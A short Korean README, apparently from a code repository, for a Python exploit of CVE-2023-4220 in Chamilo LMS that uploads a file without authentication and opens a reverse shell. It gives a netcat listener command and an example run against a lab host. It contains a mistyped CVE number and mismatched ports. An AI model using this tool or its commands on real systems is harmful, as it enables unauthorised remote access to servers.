
Chamilo LMS의 CVE-2023-4220을 위한 Python 익스플로잇으로, 파일을 업로드하고 netcat 리스너로 인증되지 않은 리버스 셸을 전달합니다.
pip install requests
이 Python 스크립트는 취약점 CVE-2023-422을 이용하여 서버에 파일을 업로드하고, 그 파일을 사용해 netcat 리스너로 리버스 셸을 전송합니다. 이 모든 과정은 인증 없이 수행할 수 있습니다. 다만, Python 스크립트를 성공적으로 사용하려면 다음 단계를 따라야 합니다.
netcat 리스너 시작:
nc -lnvp 4444
Python 스크립트 실행 (예시):
python3 main.py -u "http://lms.permx.htb" -p "80" -ni "10.10.16.24" -np "4445"
이 익스플로잇이 유용했다면 별을 남겨주세요 :)